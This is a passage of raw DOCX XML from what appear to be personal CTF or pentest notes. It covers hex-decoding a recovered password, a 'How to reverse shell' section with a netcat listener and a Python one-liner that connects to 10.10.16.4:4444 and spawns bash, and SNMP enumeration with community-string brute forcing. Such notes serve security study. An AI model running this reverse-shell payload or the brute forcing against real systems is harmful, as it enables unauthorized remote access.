        <w:t xml:space="preserve">s='50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 11 9 122 123 126 130 131 134 135'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binascii.unhexlify(s.replace(' ',''))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will get a result like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">b'P@ssw0rd@123!!123\x13\x91q\x81\x92"2Rbs\x03\x133CSs\x83\x94$4\x95\x05\x15Eu\x86\x16WGW\x98(8i\t\x19IY\x81\x03\x10a\x11\x11A\x15\x11\x91"\x121&amp;\x13\x011\x13A5'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The password will be</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: P@ssw0rd@123!!123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you could use any</w:t>
      </w:r>
      <w:hyperlink r:id="rId1097">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> hex to text website</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then you will see something like this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3543300" cy="1190625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1098"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3543300" cy="1190625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="860"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see a lot of weird characters but everything before the weird characters is the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A2">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="837"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="837"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"10.10.16.4",4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="837"/>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"10.10.16.4",4444 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with your own IP and port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o8q6iyvigplg" w:id="440"/>
      <w:bookmarkEnd w:id="440"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ENUMERATING SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is my old stuff before I understood it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Verify SNMP Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, confirm that SNMP is accessible using tools like snmp-check or snmpwalk with a common public community string (e.g., public).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v1 -c public &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">v1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Specifies SNMP version 1 (default version for many devices).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c public</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Uses the community string public (default for many devices).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Check Community Strings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the default public string doesn't work, try brute-forcing the community string with tools like Onesixtyone or snmp-brute in Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Onesixtyone:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone -c community.txt &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1258"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> community.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a wordlist of common community strings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap with snmp-brute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sU -p 161 --script snmp-brute &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Enumerate Using SNMPwalk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you have the correct community string, enumerate detailed information using snmpwalk:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v2c -c &lt;community&gt; &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
